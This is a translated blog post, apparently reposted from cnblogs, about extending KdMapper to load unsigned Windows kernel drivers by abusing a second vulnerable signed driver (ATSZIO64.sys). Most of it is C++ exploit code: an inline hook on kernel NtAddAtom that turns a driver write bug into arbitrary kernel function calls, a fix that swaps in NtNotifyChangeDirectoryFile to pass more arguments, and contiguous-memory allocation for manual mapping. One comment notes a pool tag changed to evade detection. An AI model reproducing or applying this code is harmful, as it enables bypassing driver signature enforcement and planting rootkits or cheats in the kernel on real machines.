
Issues Encountered While Extending KdMapper

Posted: 2023-09-03 17:00:27

1. Background

  KdMapper is a tool that exploits a vulnerable Intel driver to load unsigned drivers without leaving traces. I adapted the same approach to a different vulnerable driver (see 《【转载】利用签名驱动漏洞加载未签名驱动》) to achieve similar functionality, and ran into two significant problems along the way; they are recorded here for reference.

 

2. The CallKernelFunction Problem and Its Fix

 

2.1 Relevant core code

template<typename T, typename ...A>
bool CallKernelFunction(HANDLE device_handle, T* out_result, uint64_t kernel_function_address, const A ...arguments)
{
     ......   
    
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    ......
    const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtAddAtom"));
    ......
    uint8_t kernel_injected_jmp[] = { 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0 };
    uint8_t original_kernel_function[sizeof(kernel_injected_jmp)];
    *(uint64_t*)&kernel_injected_jmp[2] = kernel_function_address;

    static uint64_t kernel_NtAddAtom = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "NtAddAtom");
    ......
    if (!ReadMemory(device_handle, kernel_NtAddAtom, &original_kernel_function, sizeof(kernel_injected_jmp)))
        return false;
    ......
    if (!WriteToReadOnlyMemory(device_handle, kernel_NtAddAtom, &kernel_injected_jmp, sizeof(kernel_injected_jmp)))
        return false;
    
    if constexpr (!call_void)
    {
        using FunctionFn = T(__stdcall*)(A...);
        const auto Function = reinterpret_cast<FunctionFn>(NtAddAtom);
        *out_result = Function(arguments...);
    }
    else 
    {
        using FunctionFn = void(__stdcall*)(A...);
        const auto Function = reinterpret_cast<FunctionFn>(NtAddAtom);
        Function(arguments...);
    }
    // Restore the pointer/jmp
    WriteToReadOnlyMemory(device_handle, kernel_NtAddAtom, original_kernel_function, sizeof(kernel_injected_jmp));
    return true;
}

   The principle is an inline hook of the system-call function NtAddAtom: a jump to the target function is written at the head of the kernel's NtAddAtom, then the corresponding user-mode syscall stub NtAddAtom in ntdll is invoked, and the resulting transition into the kernel lands on the hooked code.

 

2.2 Observing in the debugger

  As shown in the screenshot:

  Use the command ba e1 nt!NtAddAtom to set an execute breakpoint on the function, then run KdMapper. When the breakpoint hits, you can see that NtAddAtom's code has indeed been replaced with a jump to ExAcquireResourceExclusiveLite — this is how the code invokes the target function.

 

2.3 Other functions invoked this way

  A search for CallKernelFunction call sites turns up several target functions, as follows:

  Apart from MmMapLockedPagesSpecifyCache, all of them take four or fewer parameters; that the MmMapLockedPagesSpecifyCache call succeeds may well be a coincidence (analyzed below).

 

2.4 The logic of the call

  Section 2.1 showed that NtAddAtom is inline-hooked in the kernel, then ntdll's NtAddAtom is called from user mode, which transitions from user space into the kernel. During that SSDT-dispatched system call, however, the system copies user-mode arguments into the kernel according to the argument count recorded for that syscall in the SSDT (see 《WinDbg打印SSDT的参数个数脚本》 for how to dump each syscall's argument count); from that, NtAddAtom takes fewer than four arguments. Viewing the Win10 x64 NtAddAtom in IDA, as in the figure below, shows three parameters.

  Four parameters is the reference point because, under the x64 calling convention, the first four arguments are passed in the registers rcx, rdx, r8 and r9; only the fifth and later go on the memory stack. Using NtAddAtom as the trampoline therefore passes at most four arguments — any stack arguments beyond that are simply never copied from user space into kernel space.

 

2.5 The problem actually hit in the extension

  While extending the loader to another vulnerable driver, I used the MmAllocatePagesForMdlEx function, whose prototype is:

PMDL MmAllocatePagesForMdlEx(
  [in] PHYSICAL_ADDRESS    LowAddress,
  [in] PHYSICAL_ADDRESS    HighAddress,
  [in] PHYSICAL_ADDRESS    SkipBytes,
  [in] SIZE_T              TotalBytes,
  [in] MEMORY_CACHING_TYPE CacheType,
  [in] ULONG               Flags
);

  Six parameters in total. When called directly, the data passed in the last two parameters never arrived correctly; only after debugging and analysis did it become clear that those two parameters were never copied from user space into kernel space. The success of MmMapLockedPagesSpecifyCache really is just a coincidence — presumably its last two parameters do not affect whether the call succeeds.

 

2.6 How to fix it

  The fix is simply to replace NtAddAtom with a native API that takes more parameters and has a corresponding stub in ntdll.dll. Following 《WinDbg打印SSDT的参数个数脚本》, plus WinDbg debugging and IDA analysis of ntdll.dll, NtNotifyChangeDirectoryFile turns out to be usable: it takes nine parameters on Win10.

 

 

2.7 Code after the fix

template<typename T, typename ...A>
bool CallKernelFunction(HANDLE device_handle, T* out_result, uint64_t kernel_function_address, const A ...arguments)
{
     ......   
    
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    ......
    //NtAddAtom takes too few parameters, so only a little data is copied on the R3->R0 transition:
    //the first four arguments travel in rcx, rdx, r8 and r9; anything beyond four goes on the stack.
    //With NtAddAtom as the trampoline, MmAllocatePagesForMdlEx (6 parameters) and
    //MmMapLockedPagesSpecifyCache (6 parameters) fail because their trailing arguments are never copied into the kernel.
    //NtNotifyChangeDirectoryFileEx takes 10 parameters, but Win10 has it and Win7 does not;
    //Win7 does have NtNotifyChangeDirectoryFile (9 parameters), so that one is used here.
    //const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtAddAtom"));
    const auto NtAddAtom = reinterpret_cast<void*>(GetProcAddress(ntdll, "NtNotifyChangeDirectoryFile"));
    ......

    static uint64_t kernel_NtAddAtom = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "NtNotifyChangeDirectoryFile");
    ......

    return true;
}

 

3. MapDriver Allocation

 

3.1 Original code

uint64_t kdmapper::MapDriver(HANDLE iqvw64e_device_handle, 
                             BYTE* data, 
                             ULONG64 param1,
                             ULONG64 param2,
                             bool free, 
                             bool destroyHeader,
                             bool mdlMode, 
                             bool PassAllocationAddressAsFirstParam,
                             mapCallback callback, 
                             NTSTATUS* exitCode) 
{
    ......
    if (mdlMode) {
		kernel_image_base = AllocMdlMemory(iqvw64e_device_handle, image_size, &mdlptr);
	}
	else {
		kernel_image_base = intel_driver::AllocatePool(iqvw64e_device_handle, nt::POOL_TYPE::NonPagedPool, image_size);
	}
    ......
    if (!intel_driver::WriteMemory(iqvw64e_device_handle, realBase, (PVOID)((uintptr_t)local_image_base + (destroyHeader ? TotalVirtualHeaderSize : 0)), image_size))
    {
		Log(L"[-] Failed to write local image to remote image" << std::endl);
		kernel_image_base = realBase;
		break;
	}
    ......
    if (!asus_driver::CallKernelFunction(asus_device_handle, &status, address_of_entry_point, (PassAllocationAddressAsFirstParam ? realBase : param1), param2)) {
        Log(L"[-] Failed to call driver entry" << std::endl);
        kernel_image_base = realBase;
        break;
    }
    ......
}

uint64_t kdmapper::AllocMdlMemory(HANDLE iqvw64e_device_handle, uint64_t size, uint64_t* mdlPtr) {
	/*added by psec*/
	LARGE_INTEGER LowAddress, HighAddress;
	LowAddress.QuadPart = 0;
	HighAddress.QuadPart = 0xffff'ffff'ffff'ffffULL;

	uint64_t pages = (size / PAGE_SIZE) + 1;
	auto mdl = intel_driver::MmAllocatePagesForMdl(iqvw64e_device_handle, LowAddress, HighAddress, LowAddress, pages * (uint64_t)PAGE_SIZE);
	if (!mdl) {
		Log(L"[-] Can't allocate pages for mdl" << std::endl);
		return { 0 };
	}

	uint32_t byteCount = 0;
	if (!intel_driver::ReadMemory(iqvw64e_device_handle, mdl + 0x028 /*_MDL : byteCount*/, &byteCount, sizeof(uint32_t))) {
		Log(L"[-] Can't read the _MDL : byteCount" << std::endl);
		return { 0 };
	}

	if (byteCount < size) {
		Log(L"[-] Couldn't allocate enough memory, cleaning up" << std::endl);
		intel_driver::MmFreePagesFromMdl(iqvw64e_device_handle, mdl);
		intel_driver::FreePool(iqvw64e_device_handle, mdl);
		return { 0 };
	}

	auto mappingStartAddress = intel_driver::MmMapLockedPagesSpecifyCache(iqvw64e_device_handle, mdl, nt::KernelMode, nt::MmCached, NULL, FALSE, nt::NormalPagePriority);
	if (!mappingStartAddress) {
		Log(L"[-] Can't set mdl pages cache, cleaning up." << std::endl);
		intel_driver::MmFreePagesFromMdl(iqvw64e_device_handle, mdl);
		intel_driver::FreePool(iqvw64e_device_handle, mdl);
		return { 0 };
	}

	const auto result = intel_driver::MmProtectMdlSystemAddress(iqvw64e_device_handle, mdl, PAGE_EXECUTE_READWRITE);
	if (!result) {
		Log(L"[-] Can't change protection for mdl pages, cleaning up" << std::endl);
		intel_driver::MmUnmapLockedPages(iqvw64e_device_handle, mappingStartAddress, mdl);
		intel_driver::MmFreePagesFromMdl(iqvw64e_device_handle, mdl);
		intel_driver::FreePool(iqvw64e_device_handle, mdl);
		return { 0 };
	}
	Log(L"[+] Allocated pages for mdl" << std::endl);

	if (mdlPtr)
		*mdlPtr = mdl;

	return mappingStartAddress;
}

uint64_t intel_driver::AllocatePool(HANDLE device_handle, nt::POOL_TYPE pool_type, uint64_t size) {
	if (!size)
		return 0;

	static uint64_t kernel_ExAllocatePool = GetKernelModuleExport(device_handle, intel_driver::ntoskrnlAddr, "ExAllocatePoolWithTag");

	if (!kernel_ExAllocatePool) {
		Log(L"[!] Failed to find ExAllocatePool" << std::endl);
		return 0;
	}

	uint64_t allocated_pool = 0;

	if (!CallKernelFunction(device_handle, &allocated_pool, kernel_ExAllocatePool, pool_type, size, 'BwtE')) //Changed pool tag since an extremely meme checking diff between allocation size and average for detection....
		return 0;

	return allocated_pool;
}

  The code shows that when the specified driver file is loaded, memory is allocated with either AllocatePool or AllocMdlMemory depending on whether MDL mode is selected. Both functions return memory whose virtual addresses are contiguous but whose physical pages are not, which causes problems in some situations.

 

3.2 Problems when reading and writing through physical memory

  Section 3.1 shows the original allocation scheme. It causes no problem in stock kdmapper because the Intel driver exploit reads and writes virtual addresses directly; the memory-copy code, for example, looks like this:

bool intel_driver::MemCopy(HANDLE device_handle, uint64_t destination, uint64_t source, uint64_t size) {
	if (!destination || !source || !size)
		return 0;

	COPY_MEMORY_BUFFER_INFO copy_memory_buffer = { 0 };

	copy_memory_buffer.case_number = 0x33;
	copy_memory_buffer.source = source;
	copy_memory_buffer.destination = destination;
	copy_memory_buffer.length = size;

	DWORD bytes_returned = 0;
	return DeviceIoControl(device_handle, ioctl1, &copy_memory_buffer, sizeof(copy_memory_buffer), nullptr, 0, &bytes_returned, nullptr);
}

  So nothing goes wrong there, because the driver operates on virtual memory directly. Other exploited drivers, however, sometimes work through physical memory. For example (see 《【转载】利用签名驱动漏洞加载未签名驱动》), the IDA decompilation from ATSZIO64.sys:

// MapPhysicalMemory
NTSTATUS __fastcall sub_140005B0C(union _LARGE_INTEGER Offset, unsigned int nSize, PVOID *pAddressMapped, void **hSection)
{
  ULONG_PTR nSizeMapped; // rbx
  NTSTATUS result; // eax
  SIZE_T v9; // r15
  NTSTATUS ntStatus; // eax
  void *hSectionMapped; // rcx
  NTSTATUS ntStatusReturn; // ebx
  NTSTATUS ntStatusMap; // ebx
  union _LARGE_INTEGER SectionOffset; // [rsp+58h] [rbp-39h] BYREF
  ULONG_PTR ViewSize; // [rsp+60h] [rbp-31h] BYREF
  struct _OBJECT_ATTRIBUTES ObjectAttributes; // [rsp+68h] [rbp-29h] BYREF
  struct _UNICODE_STRING DestinationString; // [rsp+98h] [rbp+7h] BYREF
  PVOID Object; // [rsp+A8h] [rbp+17h] BYREF
  PVOID BaseAddress; // [rsp+F8h] [rbp+67h] BYREF

  nSizeMapped = nSize;
  RtlInitUnicodeString(&DestinationString, L"\\Device\\PhysicalMemory");
  ObjectAttributes.RootDirectory = 0i64;
  ObjectAttributes.SecurityDescriptor = 0i64;
  ObjectAttributes.SecurityQualityOfService = 0i64;
  ObjectAttributes.ObjectName = &DestinationString;
  ObjectAttributes.Length = 48;
  ObjectAttributes.Attributes = 512;
  result = ZwOpenSection(hSection, 7u, &ObjectAttributes);
  BaseAddress = 0i64;
  v9 = (unsigned int)nSizeMapped;
  ViewSize = nSizeMapped;
  SectionOffset = Offset;
  if ( result >= 0 )
  {
    ntStatus = ObReferenceObjectByHandle(*hSection, 7u, 0i64, 0, &Object, 0i64);
    hSectionMapped = *hSection;
    ntStatusReturn = ntStatus;
    if ( ntStatus >= 0 )
    {
      ntStatusMap = ZwMapViewOfSection(
                      hSectionMapped,
                      (HANDLE)0xFFFFFFFFFFFFFFFFi64,
                      &BaseAddress,
                      0i64,
                      v9,
                      &SectionOffset,
                      &ViewSize,
                      ViewShare,
                      0,
                      4u);
      ZwClose(*hSection);
      result = ntStatusMap;
      *pAddressMapped = BaseAddress;
      return result;
    }
    ZwClose(hSectionMapped);
    result = ntStatusReturn;
  }
  *pAddressMapped = 0i64;
  return result;
}

  It first maps physical memory into user space and then operates on that mapping. With this approach, reads and writes break down once the operation spans more than one page: contiguity of physical addresses does not guarantee that the corresponding virtual addresses are contiguous, as shown below:

  The figure shows contiguous virtual pages whose physical pages are not contiguous; likewise, contiguous physical pages do not necessarily correspond to contiguous virtual pages.

  This leads to a concrete problem: when MapDriver writes the driver file into memory with WriteMemory through the physical-memory mapping, the write is linear in physical address space. Although that mapping looks contiguous, only the first virtual page of the target buffer actually receives its data; the remaining pages are never truly written. The failure then surfaces when CallKernelFunction invokes the driver's entry point, causing a BSOD.

 

3.3 Solution

  Use allocation functions that return physically contiguous pages: MmAllocatePagesForMdlEx and MmAllocateContiguousMemory. With these functions the physical pages are contiguous, the mapped virtual pages are contiguous as well, and the two correspond one-to-one, so reading and writing the data no longer goes wrong.

 

3.4 Implementation

uint64_t asus_driver::MmAllocateContiguousMemory(HANDLE device_handle, SIZE_T NumberOfBytes)
{
        if (!NumberOfBytes)
                return 0;

        static uint64_t kernel_MmAllocateContiguousMemory = GetKernelModuleExport(device_handle, asus_driver::ntoskrnlAddr, "MmAllocateContiguousMemory");

        if (!kernel_MmAllocateContiguousMemory) {
                Log(L"[!] Failed to find MmAllocateContiguousMemory" << std::endl);
                return 0;
        }

        uint64_t pAddress = 0;

        if (!CallKernelFunction(device_handle, &pAddress, kernel_MmAllocateContiguousMemory, NumberOfBytes, MAXULONG64)) // second argument is HighestAcceptableAddress
                return 0;

        return pAddress;
}

uint64_t asus_driver::MmAllocatePagesForMdlEx(HANDLE device_handle, LARGE_INTEGER LowAddress, LARGE_INTEGER HighAddress, LARGE_INTEGER SkipBytes, SIZE_T TotalBytes, nt::MEMORY_CACHING_TYPE CacheType, nt::MEMORY_ALLOCATE_FLAG Flags)
{
        static uint64_t kernel_MmAllocatePagesForMdlEx = GetKernelModuleExport(device_handle, asus_driver::ntoskrnlAddr, "MmAllocatePagesForMdlEx");
        if (!kernel_MmAllocatePagesForMdlEx)
        {
                Log(L"[!] Failed to find MmAllocatePagesForMdlEx" << std::endl);
                return 0;
        }

        uint64_t allocated_pages = 0;

        if (!CallKernelFunction(device_handle, &allocated_pages, kernel_MmAllocatePagesForMdlEx, LowAddress, HighAddress, SkipBytes, TotalBytes, CacheType, Flags))
        {
                Log(L"[!] Failed to CallKernelFunction MmAllocatePagesForMdlEx" << std::endl);
                return 0;
        }

        return allocated_pages;
}

uint64_t kdmapper::AllocContiguousMdlMemory(HANDLE asus_device_handle, uint64_t size, uint64_t* mdlPtr) {
        /*added by psec*/
        LARGE_INTEGER LowAddress, HighAddress, SkipAddress;
        LowAddress.QuadPart = 0;
        HighAddress.QuadPart = 0xffff'ffff'ffff'ffffULL;
        SkipAddress.QuadPart = 0;
        uint64_t pages = (size / PAGE_SIZE) + 1;
        auto mdl = asus_driver::MmAllocatePagesForMdlEx(
                asus_device_handle,
                LowAddress,
                HighAddress,
                SkipAddress,
                pages * (uint64_t)PAGE_SIZE,
                nt::MEMORY_CACHING_TYPE::MmNonCached,
                nt::MEMORY_ALLOCATE_FLAG::MM_ALLOCATE_REQUIRE_CONTIGUOUS_CHUNKS);
        if (!mdl) {
                Log(L"[-] Can't allocate pages for mdl" << std::endl);
                return { 0 };
        }

        uint32_t byteCount = 0;
        if (!asus_driver::ReadMemory(asus_device_handle, mdl + 0x028 /*_MDL : byteCount*/, &byteCount, sizeof(uint32_t))) {
                Log(L"[-] Can't read the _MDL : byteCount" << std::endl);
                return { 0 };
        }

        if (byteCount < size) {
                Log(L"[-] Couldn't allocate enough memory, cleaning up" << std::endl);
                asus_driver::MmFreePagesFromMdl(asus_device_handle, mdl);
                asus_driver::FreePool(asus_device_handle, mdl);
                return { 0 };
        }

        auto mappingStartAddress = asus_driver::MmMapLockedPagesSpecifyCache(asus_device_handle, mdl, nt::KernelMode, nt::MmCached, NULL, FALSE, nt::NormalPagePriority);
        if (!mappingStartAddress) {
                Log(L"[-] Can't set mdl pages cache, cleaning up." << std::endl);
                asus_driver::MmFreePagesFromMdl(asus_device_handle, mdl);
                asus_driver::FreePool(asus_device_handle, mdl);
                return { 0 };
        }

        const auto result = asus_driver::MmProtectMdlSystemAddress(asus_device_handle, mdl, PAGE_EXECUTE_READWRITE);
        if (!result) {
                Log(L"[-] Can't change protection for mdl pages, cleaning up" << std::endl);
                asus_driver::MmUnmapLockedPages(asus_device_handle, mappingStartAddress, mdl);
                asus_driver::MmFreePagesFromMdl(asus_device_handle, mdl);
                asus_driver::FreePool(asus_device_handle, mdl);
                return { 0 };
        }
        Log(L"[+] Allocated pages for mdl" << std::endl);

        if (mdlPtr)
                *mdlPtr = mdl;

        return mappingStartAddress;
}

uint64_t kdmapper::MapDriver(HANDLE iqvw64e_device_handle, 
                             BYTE* data, 
                             ULONG64 param1,
                             ULONG64 param2,
                             bool free, 
                             bool destroyHeader,
                             bool mdlMode, 
                             bool PassAllocationAddressAsFirstParam,
                             mapCallback callback, 
                             NTSTATUS* exitCode) 
{
    ......
    if (mdlMode) {
        //kernel_image_base = AllocMdlMemory(asus_device_handle, image_size, &mdlptr);
        kernel_image_base = AllocContiguousMdlMemory(asus_device_handle, image_size, &mdlptr);
    }
	else {
        //kernel_image_base = asus_driver::AllocatePool(asus_device_handle, nt::POOL_TYPE::NonPagedPool, image_size);
        kernel_image_base = asus_driver::MmAllocateContiguousMemory(asus_device_handle, image_size);    
    }
    ......
}

 

From: https://www.cnblogs.com/ImprisonedSoul/p/17674671.html
